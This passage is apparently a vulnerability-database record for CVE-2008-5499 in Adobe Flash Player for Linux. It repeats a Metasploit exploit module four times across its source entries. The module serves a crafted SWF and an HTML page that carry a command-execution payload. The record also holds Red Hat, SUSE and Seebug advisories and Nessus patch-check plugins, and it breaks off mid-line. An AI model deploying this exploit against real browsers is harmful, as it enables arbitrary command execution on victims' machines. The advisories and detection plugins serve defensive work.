platform", "published": "2012-04-20T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2012-04-20T00:00:00", "id": "EDB-ID:18761", "href": "https://www.exploit-db.com/exploits/18761/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player for Linux,\r\n\t\t\t\t\tversion 10.0.12.36 and 9.0.151.0 and prior.\r\n\t\t\t\t\tAn input validation vulnerability allows command execution when the browser\r\n\t\t\t\t\tloads a SWF file which contains shell metacharacters in the arguments to\r\n\t\t\t\t\tthe ActionScript launch method.\r\n\r\n\t\t\t\t\tThe victim must have Adobe AIR installed for the exploit to work. This module\r\n\t\t\t\t\twas tested against version 10.0.12.36 (10r12_36).\r\n\t\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2008-5499'],\r\n\t\t\t\t\t['OSVDB', '50796'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],\r\n\t\t\t\t\t['URL', 'http://www.securityfocus.com/bid/32896/exploit']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix', # so unix cmd exec payloads are ok\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {}],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 17 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-5499.swf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\t@swf = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tmsg = \"#{cli.peerhost.ljust(16)} #{self.shortname}\"\r\n\t\ttrigger = @swf\r\n\t\ttrigger_file = rand_text_alpha(rand(6)+3) + \".swf\"\r\n\r\n\t\tobj_id = rand_text_alpha(rand(6)+3)\r\n\r\n\t\tif request.uri.match(/\\.swf/i)\r\n\t\t\tprint_status(\"#{msg} Sending Exploit SWF\")\r\n\t\t\tsend_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri.match(/\\.txt/i)\r\n\t\t\tsend_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = <<-EOS\r\n\t\t<html>\r\n\t\t\t<head>\r\n\t\t\t</head>\r\n\t\t\t<body>\r\n\t\t\t<center>\r\n\t\t\t<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" id=\"#{obj_id}\" width=\"1\" height=\"1\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\r\n\t\t\t\t<param name=\"movie\" value=\"#{get_resource}#{trigger_file}\" />\r\n\t\t\t\t<embed src=\"#{get_resource}#{trigger_file}\" quality=\"high\" width=\"1\" height=\"1\" name=\"#{obj_id}\" align=\"middle\" allowNetworking=\"all\"\r\n\t\t\t\t\ttype=\"application/x-shockwave-flash\"\r\n\t\t\t\t\tpluginspage=\"http://www.macromedia.com/go/getflashplayer\">\r\n\t\t\t\t</embed>\r\n\r\n\t\t\t</object>\r\n\t\t</center>\r\n\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\tprint_status(\"#{msg} Sending HTML...\")\r\n\t\tsend_response(cli, html, { 'Content-Type' => 'text/html' })\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18761/"}], "redhat": [{"lastseen": "2019-05-29T14:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5499"], "description": "The flash-plugin package contains a Firefox-compatible Adobe Flash Player\nWeb browser plug-in.\n\nA security flaw was found in the way Flash Player displayed certain SWF\n(Shockwave Flash) content. This may have made it possible to execute\narbitrary code on a victim's machine, if the victim opened a malicious\nAdobe Flash file. (CVE-2008-5499)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.0.15.3 for users of Red Hat Enterprise\nLinux 5 Supplementary, and 9.0.152.0 for users of Red Hat Enterprise 3 and\n4 Extras.", "modified": "2017-09-08T11:55:42", "published": "2008-12-19T05:00:00", "id": "RHSA-2008:1047", "href": "https://access.redhat.com/errata/RHSA-2008:1047", "type": "redhat", "title": "(RHSA-2008:1047) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:43:03", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5499"], "description": "The Adobe Flash Player was updated to fix an unspecified vulnerability that allowed attackers to take control of the victim's system by having the victim load a specially crafted SWF file, for instance embedded in a web page (CVE-2008-5499).\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2008-12-20T10:10:12", "published": "2008-12-20T10:10:12", "id": "SUSE-SA:2008:059", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-12/msg00006.html", "title": "remote code execution in flash-player", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:19", "description": "", "published": "2012-04-20T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player ActionScript Launch Command Execution ", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2012-04-20T00:00:00", "id": "PACKETSTORM:112009", "href": "https://packetstormsecurity.com/files/112009/Adobe-Flash-Player-ActionScript-Launch-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in Adobe Flash Player for Linux, \nversion 10.0.12.36 and 9.0.151.0 and prior. \nAn input validation vulnerability allows command execution when the browser \nloads a SWF file which contains shell metacharacters in the arguments to \nthe ActionScript launch method. \n \nThe victim must have Adobe AIR installed for the exploit to work. This module \nwas tested against version 10.0.12.36 (10r12_36). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version \n], \n'References' => \n[ \n['CVE', '2008-5499'], \n['OSVDB', '50796'], \n['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'], \n['URL', 'http://www.securityfocus.com/bid/32896/exploit'] \n], \n'DefaultOptions' => \n{ \n'HTTP::compression' => 'gzip', \n'HTTP::chunked' => true \n}, \n'Platform' => 'unix', # so unix cmd exec payloads are ok \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n[ 'Automatic', {}], \n], \n'DisclosureDate' => 'Dec 17 2008', \n'DefaultTarget' => 0)) \n \nend \n \ndef exploit \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-5499.swf\" ) \nfd = File.open( path, \"rb\" ) \n@swf = fd.read(fd.stat.size) \nfd.close \n \nsuper \nend \n \ndef on_request_uri(cli, request) \nmsg = \"#{cli.peerhost.ljust(16)} #{self.shortname}\" \ntrigger = @swf \ntrigger_file = rand_text_alpha(rand(6)+3) + \".swf\" \n \nobj_id = rand_text_alpha(rand(6)+3) \n \nif request.uri.match(/\\.swf/i) \nprint_status(\"#{msg} Sending Exploit SWF\") \nsend_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' }) \nreturn \nend \n \nif request.uri.match(/\\.txt/i) \nsend_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) \nreturn \nend \n \nhtml = <<-EOS \n<html> \n<head> \n</head> \n<body> \n<center> \n<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" id=\"#{obj_id}\" width=\"1\" height=\"1\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\"> \n<param name=\"movie\" value=\"#{get_resource}#{trigger_file}\" /> \n<embed src=\"#{get_resource}#{trigger_file}\" quality=\"high\" width=\"1\" height=\"1\" name=\"#{obj_id}\" align=\"middle\" allowNetworking=\"all\" \ntype=\"application/x-shockwave-flash\" \npluginspage=\"http://www.macromedia.com/go/getflashplayer\"> \n</embed> \n \n</object> \n</center> \n \n</body> \n</html> \nEOS \n \nprint_status(\"#{msg} Sending HTML...\") \nsend_response(cli, html, { 'Content-Type' => 'text/html' }) \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112009/adobe_flashplayer_aslaunch.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T17:57:35", "description": "No description provided by source.", "published": "2012-04-20T00:00:00", "type": "seebug", "title": "Adobe Flash Player ActionScript Launch Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2012-04-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60075", "id": "SSV:60075", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Adobe Flash Player for Linux,\r\n version 10.0.12.36 and 9.0.151.0 and prior.\r\n An input validation vulnerability allows command execution when the browser\r\n loads a SWF file which contains shell metacharacters in the arguments to\r\n the ActionScript launch method.\r\n\r\n The victim must have Adobe AIR installed for the exploit to work. This module\r\n was tested against version 10.0.12.36 (10r12_36).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2008-5499'],\r\n ['OSVDB', '50796'],\r\n ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],\r\n ['URL', 'http://www.securityfocus.com/bid/32896/exploit']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'HTTP::compression' => 'gzip',\r\n 'HTTP::chunked' => true\r\n },\r\n 'Platform' => 'unix', # so unix cmd exec payloads are ok\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {}],\r\n ],\r\n 'DisclosureDate' => 'Dec 17 2008',\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def exploit\r\n path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )\r\n fd = File.open( path, "rb" )\r\n @swf = fd.read(fd.stat.size)\r\n fd.close\r\n\r\n super\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"\r\n trigger = @swf\r\n trigger_file = rand_text_alpha(rand(6)+3) + ".swf"\r\n\r\n obj_id = rand_text_alpha(rand(6)+3)\r\n\r\n if request.uri.match(/\\.swf/i)\r\n print_status("#{msg} Sending Exploit SWF")\r\n send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n return\r\n end\r\n\r\n if request.uri.match(/\\.txt/i)\r\n send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\r\n return\r\n end\r\n\r\n html = <<-EOS\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n <center>\r\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">\r\n <param name="movie" value="#{get_resource}#{trigger_file}" />\r\n <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"\r\n type="application/x-shockwave-flash"\r\n pluginspage="http://www.macromedia.com/go/getflashplayer">\r\n </embed>\r\n\r\n </object>\r\n </center>\r\n\r\n </body>\r\n </html>\r\n EOS\r\n\r\n print_status("#{msg} Sending HTML...")\r\n send_response(cli, html, { 'Content-Type' => 'text/html' })\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60075", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T14:54:57", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72802", "id": "SSV:72802", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player for Linux,\r\n\t\t\t\t\tversion 10.0.12.36 and 9.0.151.0 and prior.\r\n\t\t\t\t\tAn input validation vulnerability allows command execution when the browser\r\n\t\t\t\t\tloads a SWF file which contains shell metacharacters in the arguments to\r\n\t\t\t\t\tthe ActionScript launch method.\r\n\r\n\t\t\t\t\tThe victim must have Adobe AIR installed for the exploit to work. This module\r\n\t\t\t\t\twas tested against version 10.0.12.36 (10r12_36).\r\n\t\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2008-5499'],\r\n\t\t\t\t\t['OSVDB', '50796'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],\r\n\t\t\t\t\t['URL', 'http://www.securityfocus.com/bid/32896/exploit']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix', # so unix cmd exec payloads are ok\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {}],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 17 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tpath = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )\r\n\t\tfd = File.open( path, "rb" )\r\n\t\t@swf = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tmsg = "#{cli.peerhost.ljust(16)} #{self.shortname}"\r\n\t\ttrigger = @swf\r\n\t\ttrigger_file = rand_text_alpha(rand(6)+3) + ".swf"\r\n\r\n\t\tobj_id = rand_text_alpha(rand(6)+3)\r\n\r\n\t\tif request.uri.match(/\\.swf/i)\r\n\t\t\tprint_status("#{msg} Sending Exploit SWF")\r\n\t\t\tsend_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri.match(/\\.txt/i)\r\n\t\t\tsend_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = <<-EOS\r\n\t\t<html>\r\n\t\t\t<head>\r\n\t\t\t</head>\r\n\t\t\t<body>\r\n\t\t\t<center>\r\n\t\t\t<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">\r\n\t\t\t\t<param name="movie" value="#{get_resource}#{trigger_file}" />\r\n\t\t\t\t<embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"\r\n\t\t\t\t\ttype="application/x-shockwave-flash"\r\n\t\t\t\t\tpluginspage="http://www.macromedia.com/go/getflashplayer">\r\n\t\t\t\t</embed>\r\n\r\n\t\t\t</object>\r\n\t\t</center>\r\n\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\tprint_status("#{msg} Sending HTML...")\r\n\t\tsend_response(cli, html, { 'Content-Type' => 'text/html' })\r\n\tend\r\nend\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72802"}, {"lastseen": "2017-11-19T21:19:37", "description": "BUGTRAQ ID: 32896\r\nCVE(CAN) ID: CVE-2008-5499\r\n\r\nFlash Player\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684FLASH\u64ad\u653e\u5668\u3002\r\n\r\nFlash Player\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u5982\u679c\u4f7f\u7528Linux\u7248\u672c\u7684Adobe Flash Player\u6253\u5f00\u4e86\u7279\u5236\u7684SWF\u6587\u4ef6\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u5bfc\u81f4\u5728\u7528\u6237\u7cfb\u7edf\u4e0a\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nAdobe Flash Player for Linux 9.x\r\nAdobe Flash Player for Linux 10.x\n Adobe\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.adobe.com/go/kb406791 target=_blank>http://www.adobe.com/go/kb406791</a>\r\n<a href=http://get.adobe.com/flashplayer target=_blank>http://get.adobe.com/flashplayer</a>\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2008:1047-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2008:1047-01\uff1aCritical: flash-plugin security update\r\n\u94fe\u63a5\uff1a<a href=https://www.redhat.com/support/errata/RHSA-2008-1047.html target=_blank>https://www.redhat.com/support/errata/RHSA-2008-1047.html</a>", "published": "2008-12-23T00:00:00", "title": "Adobe Flash Player for Linux SWF\u6587\u4ef6\u5904\u7406\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "modified": "2008-12-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4580", "id": "SSV:4580", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "nessus": [{"lastseen": "2021-01-01T05:51:08", "description": "An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).", "edition": 23, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : flash-player (flash-player-378)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_0_FLASH-PLAYER-081218.NASL", "href": "https://www.tenable.com/plugins/nessus/39961", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-378.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39961);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/25 13:36:31\");\n\n script_cve_id(\"CVE-2008-5499\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-378)\");\n script_summary(english:\"Check for the flash-player-378 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=458573\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"flash-player-9.0.152.0-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:52:11", "description": "An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).", "edition": 23, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : flash-player (flash-player-378)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_1_FLASH-PLAYER-081218.NASL", "href": "https://www.tenable.com/plugins/nessus/40215", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-378.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40215);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/25 13:36:31\");\n\n script_cve_id(\"CVE-2008-5499\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-378)\");\n script_summary(english:\"Check for the flash-player-378 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unspecified vulnerability in flash-player allowed attackers to take\ncontrol of the victim's system by having the victim load a specially\ncrafted SWF file (CVE-2008-5499).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=458573\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ActionScript Launch Command Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") 